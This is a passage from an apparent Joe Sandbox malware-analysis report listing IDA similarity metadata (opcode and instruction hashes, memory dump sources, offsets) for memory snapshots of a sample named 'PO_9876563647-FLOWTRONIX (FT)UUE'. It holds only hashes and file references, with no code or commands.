                                              • Opcode ID: 5317622b6ba6c3dc030aa4546d5e116a7e804412d16a8415b805ca1bcbe3fa42
                                              • Instruction ID: 3f27d5f0c3d94573cab158a0f928e8ea1861079f2b31b19a1286486822c1c0a1
                                              • Opcode Fuzzy Hash: 5317622b6ba6c3dc030aa4546d5e116a7e804412d16a8415b805ca1bcbe3fa42
                                              • Instruction Fuzzy Hash: B5419379A0022ACFDB14DFA5C844ABEBFB1FF89311F0089A9E495D7250D731DA45CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2aeb44e7bf03ff9fceca2ae29865756af7a7abc19047ea60f3227e7f8627a800
                                              • Instruction ID: 94c16e2e237084cdf4de7786d8004bf4cb09f39b5d3e08559146564d43c830cb
                                              • Opcode Fuzzy Hash: 2aeb44e7bf03ff9fceca2ae29865756af7a7abc19047ea60f3227e7f8627a800
                                              • Instruction Fuzzy Hash: B831D131700105DFCF049FA4D959A6DBBB2FF88310B1554A8EA4A9B3A1CA31DC92CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f8a3efd0909b9f2987ef2fd1cb2fb2592f1abe0931a368380b0543593e02b500
                                              • Instruction ID: df2053e5dc6f69d0c4704ea5aaf1ee9e06b45803a321be7e1dbcfa43779c92a1
                                              • Opcode Fuzzy Hash: f8a3efd0909b9f2987ef2fd1cb2fb2592f1abe0931a368380b0543593e02b500
                                              • Instruction Fuzzy Hash: 2C21F5367042409FEB056E69D854A6E7B67EFC9320B54457EE909CB391DE718C11C7A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 487279928bb5d61feda14fcfeecca805ba4f04e5d7a695c14a4d422e6de220b0
                                              • Instruction ID: fdaf103117d1678367a924ac188b49b05c0bf0866ec556747fed1b61024c70e4
                                              • Opcode Fuzzy Hash: 487279928bb5d61feda14fcfeecca805ba4f04e5d7a695c14a4d422e6de220b0
                                              • Instruction Fuzzy Hash: A0410674A012148FEB24DB24DD95FA9BBB1BB49710F1049D9EA09AB3E0C631DD81CF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485533832.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5ca0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 700fa9215cb7e6679717d52492e4ea0654bf27f410f24b2a97c8d43fd84daedf
                                              • Instruction ID: ef7bd3997c4e6cc4f47ddb91eee9514e166e56a8bcded1ce804a8150cbb7dd3f
                                              • Opcode Fuzzy Hash: 700fa9215cb7e6679717d52492e4ea0654bf27f410f24b2a97c8d43fd84daedf
                                              • Instruction Fuzzy Hash: 24316B36E0424ADFDB19CFA9C448BAEBFB1BB45309F148869D511A7290CB786981CF91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7df513844a11144fcd66cf195d4b97ec165086e1cd5abfd22d4ae444e6559ff4
                                              • Instruction ID: 950f57f6413f2bdf7e908c70fe1da76aade4b6147ce9edd90a479b1986768849
                                              • Opcode Fuzzy Hash: 7df513844a11144fcd66cf195d4b97ec165086e1cd5abfd22d4ae444e6559ff4
                                              • Instruction Fuzzy Hash: BE3169312002089FDF15CF29D884EAA3BB6FF88755F1585ADF806CB2A1DB71D995CB90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c9a588c05a7f8f27ba23b384cb2f5a583306b8405aef773b5f8c9a96e8570fef
                                              • Instruction ID: c8f437add2adb971800ee67ac8c32872f71f99aad62ea6f4e5151ab0c914edf8
                                              • Opcode Fuzzy Hash: c9a588c05a7f8f27ba23b384cb2f5a583306b8405aef773b5f8c9a96e8570fef
                                              • Instruction Fuzzy Hash: 352102323082408FC3208BA9E445666BFE5EBC2729B5988FEE14EC7151DB31EC41C751
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ed81605771f3b70e78caffa532debf1e98667ef9d0393d6a98ce561b3b474f31
                                              • Instruction ID: a4f726751bf7b7bbaee7581e3db6922bcedce6042ef995c88491711ed592f45a
                                              • Opcode Fuzzy Hash: ed81605771f3b70e78caffa532debf1e98667ef9d0393d6a98ce561b3b474f31
                                              • Instruction Fuzzy Hash: 3231F4B0E042198FDB09CFAAD848AEEBBF2FB89311F10846AD415B7650D7705945CF91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f62298868dc45fad705490dbef1659567513fbd304b71c8b56b01c2794ceaa20
                                              • Instruction ID: 0154bf4613f3e44f79ea5593ee2e8d74c203786d4f095feae42b98bf21cef607
                                              • Opcode Fuzzy Hash: f62298868dc45fad705490dbef1659567513fbd304b71c8b56b01c2794ceaa20
                                              • Instruction Fuzzy Hash: 7631F2B4E002098FDB09CFAAD848BEEBBF2FB89310F14846AD415B7654D7709949CF91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: be2432990c93cb9e53b35aac05f44df2040a4b5c5781a8983a2e5196a5df7591
                                              • Instruction ID: b24e13b3d313c06f88dc81bd4b8dc612b2872ace2050aa70c6dd7b4e2c1fe21f
                                              • Opcode Fuzzy Hash: be2432990c93cb9e53b35aac05f44df2040a4b5c5781a8983a2e5196a5df7591
                                              • Instruction Fuzzy Hash: D631B134A44105CFEB14EF94D4447E977F2FB88315FA895B6C00DA7254D7B49882CB66
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 389d5a3d60a00ad091a49f924db48d5ebbf5ebaa5a3a4f67b2965b9bcd0eccff
                                              • Instruction ID: 05a555f645891faa276519070570f41e3e947b5a4c41a800fcb9f805b1c4aec2
                                              • Opcode Fuzzy Hash: 389d5a3d60a00ad091a49f924db48d5ebbf5ebaa5a3a4f67b2965b9bcd0eccff
                                              • Instruction Fuzzy Hash: 76315A74E04609DFDB44CFAAD440AAEFBF6EB89300F11D469D829A3358E7345946CF90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef58e1c8c983a29ce0bd18f62ce118e282a1566043999485442ce8de822a5e45
                                              • Instruction ID: dec1db0e72b692aac26d5ee76dea70dbb35c6f233db8d232c4dc7c6a04e86d33
                                              • Opcode Fuzzy Hash: ef58e1c8c983a29ce0bd18f62ce118e282a1566043999485442ce8de822a5e45
                                              • Instruction Fuzzy Hash: 1B21A3317082959FDB11DF36D858A293FAABF8561170948FDF847CB291DA34D90187A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b8967f98506bb8d8732cad158cfb4878f1c6292ec2dff586573be4ccc8858125
                                              • Instruction ID: d80984e3cba1c7147b9eff40929878aedf67b44b3989ac957dc38841d6bd5672
                                              • Opcode Fuzzy Hash: b8967f98506bb8d8732cad158cfb4878f1c6292ec2dff586573be4ccc8858125
                                              • Instruction Fuzzy Hash: 01215936600148AFCB05CF99E898D99BFB2FF8C310B0644E9F20A9B272D771E915DB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5fe21da081461ea30038f5935e065a6741a0196842f86f1c00356e3714426d3b
                                              • Instruction ID: 4c7366365b5c4ad58e11cbe9ee22f9da62be3ca80f9a6105a540bf48737029ba
                                              • Opcode Fuzzy Hash: 5fe21da081461ea30038f5935e065a6741a0196842f86f1c00356e3714426d3b
                                              • Instruction Fuzzy Hash: CF31D2B4D08609DFCB09CFA6C548BAEBBF6BB49300F1094A9D419E7390D3749A80CF54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 31a7b3a9a5c3de14f7e9091b83443e8c3c5bed5e0d5255b6958b1668c4390d63
                                              • Instruction ID: 5b0c472a7e2e5a3ad858b92d05d75e6ea550893dffacd4fee39c3cc3250162ff
                                              • Opcode Fuzzy Hash: 31a7b3a9a5c3de14f7e9091b83443e8c3c5bed5e0d5255b6958b1668c4390d63
                                              • Instruction Fuzzy Hash: 3B217A35E04209DFDF14DFB5C494BAEBBF5AB44242F10C4AAE519D7290E734CA50CB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2c3462a6d5b4e4280374528b5c35bc800abefc5302718b5c1ea04b4bf36e5af6
                                              • Instruction ID: 8f5ea60eb8dad95cbf4f8934328273fa6004f05f892df8087f7a1bc7c4a37d44
                                              • Opcode Fuzzy Hash: 2c3462a6d5b4e4280374528b5c35bc800abefc5302718b5c1ea04b4bf36e5af6
                                              • Instruction Fuzzy Hash: 8E311274E00208DFCB09DFAAE8506EEBBF2FF88211F10806AE416A7364DB755951DF90
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 07d3c0cc21a0102b51652d232c8f6579082a114f69f0df453bab5a81b0611152
                                              • Instruction ID: dc92dcd292f78dabe8b39bcdc866502e3ca684a1667c2d7a95b7f81560e82f67
                                              • Opcode Fuzzy Hash: 07d3c0cc21a0102b51652d232c8f6579082a114f69f0df453bab5a81b0611152
                                              • Instruction Fuzzy Hash: 85216D703042559FCB05CF2AC884AAA7FE6BF8E200B098899FC45CB361DA31ED51CB20
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472191074.000000000265D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0265D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_265d000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee1f78029dc4fa480d9d666af16a094ec412f21b94d13f3407bfd6a6390fd05c
                                              • Instruction ID: 7d2e89ec7a4204e6c085864c0591881c45c45f4c8586c64037746804ca3b6339
                                              • Opcode Fuzzy Hash: ee1f78029dc4fa480d9d666af16a094ec412f21b94d13f3407bfd6a6390fd05c
                                              • Instruction Fuzzy Hash: 8E21F2B2504284DFEB14EF14D9C4B2ABB65FB88714F24C569EC090B286C336D857CBA2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: def6094195b33aff40d52468de17f4573497094a0d75f98d1fc1098423ffb331
                                              • Instruction ID: 2157b6b47f40ad8126cb15727946c08845f04184a870e346de1559547e6b5a00
                                              • Opcode Fuzzy Hash: 6aa24b4fe1efe1cffdf07f47395a1cbcc33d0530605a095d9a32201e8cd88626
                                              • Instruction Fuzzy Hash: A2119A70D04218CFEB58DF26C8407DEFBB6AB89312F0094A88919B3254DB302A848F50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e573255e48be94a7177f2303cf4ec920a86d72a32676735e85c905c90c8a8c8f
                                              • Instruction ID: 75f07ec49e9dc7733306a43146efafa5ce4824283e5005ae748f12cf490594af
                                              • Opcode Fuzzy Hash: e573255e48be94a7177f2303cf4ec920a86d72a32676735e85c905c90c8a8c8f
                                              • Instruction Fuzzy Hash: E801DB71200348AFD710DB2AEC80DD7BB7DFBC4A14B00897FF4168B555EBB0A94887A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 046db0e4360ef0ca71e72cc9b5f5263729b5b50ca42c502d27baaf1f097635ec
                                              • Instruction ID: d4632efe14de1db607af3e65b809db99c44f9779aa7ff69b650d8e3c18001b33
                                              • Opcode Fuzzy Hash: 046db0e4360ef0ca71e72cc9b5f5263729b5b50ca42c502d27baaf1f097635ec
                                              • Instruction Fuzzy Hash: 5A01D1353002009FC7159B25E454D267FAAFFCAA11B1544AEF956CB3B0DE31EC01C750
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3e440e8fecf3ee22fb768d08d4ae0c7bebc10a1ff43aaddeaec633492bfa0f65
                                              • Instruction ID: 3b7274c675a4eb7c73526c745e8667387b460659a26871e17120a7603060fd3d
                                              • Opcode Fuzzy Hash: 3e440e8fecf3ee22fb768d08d4ae0c7bebc10a1ff43aaddeaec633492bfa0f65
                                              • Instruction Fuzzy Hash: 44010CB0D04309DFEB48DFAAD4456AEFBF5AB49300F1495AAC419E3240D7709685CF91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2f8a4353827643f6283f25058e49ba549bf9a90d399716022bf8c5c7c73d5b7f
                                              • Instruction ID: dc788ecde39a67432b27b68341c95e80083e280234c61dcf86eff0153bc0bef6
                                              • Opcode Fuzzy Hash: 2f8a4353827643f6283f25058e49ba549bf9a90d399716022bf8c5c7c73d5b7f
                                              • Instruction Fuzzy Hash: E5F0F930B441509FD3149738A4595AE37E3DBC9320F6584AAD04AC7361CE708C43CB11
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8d091f128c2b87eab47fde37bbb953ac0468708ec9c9afc418cf71c9199c2902
                                              • Instruction ID: 9fde60a25b9bf0f599824d58d5d39e809b07626ff2364e9762841cfca5fc5cc8
                                              • Opcode Fuzzy Hash: 8d091f128c2b87eab47fde37bbb953ac0468708ec9c9afc418cf71c9199c2902
                                              • Instruction Fuzzy Hash: F0F04C31700018A7CB249B58D4454AEBB69FFC8324F00446AF915D7351DB318D17C380
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67421b7035c71078bc293154611d0e354b2b118be7191d74fdaf48989575e95d
                                              • Instruction ID: 8fe5f395aaf0b385b4886703af67037f92cc668a1f0573c2eb587684349a1d32
                                              • Opcode Fuzzy Hash: 67421b7035c71078bc293154611d0e354b2b118be7191d74fdaf48989575e95d
                                              • Instruction Fuzzy Hash: C501A475300610DFC705AB65D11891EBBA3EFCC711B108569EA46873A0CF72EC82CBD1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ca4a170c202d641033bd3da75fa43f2a4559b7a0f8d001af59da76cc23717361
                                              • Instruction ID: 82e6ae517db77860d3aa696f3baec8b61152496ffe7b8f1814846c9f8a8a9c72
                                              • Opcode Fuzzy Hash: ca4a170c202d641033bd3da75fa43f2a4559b7a0f8d001af59da76cc23717361
                                              • Instruction Fuzzy Hash: 8EF0F022B0D2905FE312867A6811725BFA1EBC6600F1D48DED0829F2A3DA969842C380
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 26bcce0405d19948fb550e51848d71da2fadc4fbf28425838f9365fe320ace71
                                              • Instruction ID: 09e88a94ed52ae60602b48ff68f117c081452796adde5cd5fcd5ad17d555702e
                                              • Opcode Fuzzy Hash: 26bcce0405d19948fb550e51848d71da2fadc4fbf28425838f9365fe320ace71
                                              • Instruction Fuzzy Hash: 46E092E3D252886FDE067B7688B5ACCBF909D3317131A4BCE9131C61E2EC20998F9655
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8169c899335cdbb9df05984a1db35516275929a4da75e3edcee81170ff219d3f
                                              • Instruction ID: b346cb4edad3e6b75416584ad119e07a24e414e69220fa6aa4c81a3bf95f778d
                                              • Opcode Fuzzy Hash: 8169c899335cdbb9df05984a1db35516275929a4da75e3edcee81170ff219d3f
                                              • Instruction Fuzzy Hash: D1F02B36B086115FE314D765D800B6ABBA5FBC8310F1845EEE5499B352DB76DC41C784
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2df82e22b27a348405f418539fbbd90f2f02c9e141af500833c1d06e5b5a2a17
                                              • Instruction ID: 106bf8b703241e375c4260833eb3a6612cacc016a335926b9fcfe2d845cc29e6
                                              • Opcode Fuzzy Hash: 2df82e22b27a348405f418539fbbd90f2f02c9e141af500833c1d06e5b5a2a17
                                              • Instruction Fuzzy Hash: C0F0E932B086115FE714D65A9800B2BFBA9FBC8720F1444EDE50A9B341DBB6EC41C7C4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0142da1e8814d0f6f1cc7749e6f55a4342bb20174251c2aae0a82c629898c6d5
                                              • Instruction ID: b04e52319c5cf1855768bc1bfc78e54fdc253cc847ec879add27b2dfd4b8a07c
                                              • Opcode Fuzzy Hash: 0142da1e8814d0f6f1cc7749e6f55a4342bb20174251c2aae0a82c629898c6d5
                                              • Instruction Fuzzy Hash: 50F02B321043484FDB02973EEC949CBBF66AFC511971895BAE0858F163EE749C49C7A1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 71202aea03680134cd06e1c9e471c385a94644de3e1f4748b24c5faaae96025d
                                              • Instruction ID: 38ffa36bd79cf5a1a9c466c1dbbdf834eeaa347aed7223d06493c64ce1a5240d
                                              • Opcode Fuzzy Hash: 71202aea03680134cd06e1c9e471c385a94644de3e1f4748b24c5faaae96025d
                                              • Instruction Fuzzy Hash: 3AF0545170D1780FD731056E6C9D6766EA5FBC9A057841DFEE4CBC72A1E502CCC153A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 10ac705dd878fa6aa4d0dfaaac518819d1c9e557bde97ea5c0a559b0d44f3333
                                              • Instruction ID: 1b55946787c4a648a5eecfef2ef2f4f8c8d3dad9059d2743d9a369696dc56089
                                              • Opcode Fuzzy Hash: 10ac705dd878fa6aa4d0dfaaac518819d1c9e557bde97ea5c0a559b0d44f3333
                                              • Instruction Fuzzy Hash: 50F0B436B046115FE314D6659801B6ABBA9EBC8620F1849EEE549AB341DB75AC418780
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d5566c6ebc6f87c06816a4b56d52a4c10d538edd6f117bcc7b09a5cf1ac1baa3
                                              • Instruction ID: 96afcd7dc7dd739b8b96d20a15374540436748735d1e97a6bb063e299f6d8574
                                              • Opcode Fuzzy Hash: d5566c6ebc6f87c06816a4b56d52a4c10d538edd6f117bcc7b09a5cf1ac1baa3
                                              • Instruction Fuzzy Hash: BDF01474D15208DFCB44DFA8D8486AEBBF8FB09201F2048A99819F3240E7305A41CB91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 03268810331b5b2484c2d95da1a21c1d68bd57e925eb3b2f169701c9973d23a9
                                              • Instruction ID: 432120c2a03b9bdef4e47a0995246c61591512ebff741656f460719b0b290444
                                              • Opcode Fuzzy Hash: 03268810331b5b2484c2d95da1a21c1d68bd57e925eb3b2f169701c9973d23a9
                                              • Instruction Fuzzy Hash: 9CF09A307401208FD318EB29E419A6E33E7EBC9320FA584AAE10AC7354CE71EC42CB50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7f5a7fd3e5291f68b7551e9d9e7ef4b0457d59c2eea34cc19b38220771c0ba35
                                              • Instruction ID: 36b2e4882625b30d0293736235bf1f76bf60ec60aea5b2aaf405b1fef025df16
                                              • Opcode Fuzzy Hash: 7f5a7fd3e5291f68b7551e9d9e7ef4b0457d59c2eea34cc19b38220771c0ba35
                                              • Instruction Fuzzy Hash: EEF05E75A80480CFEB009F31E5943E63BF3FB89322F6891A2D94597106E7349497CA04
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
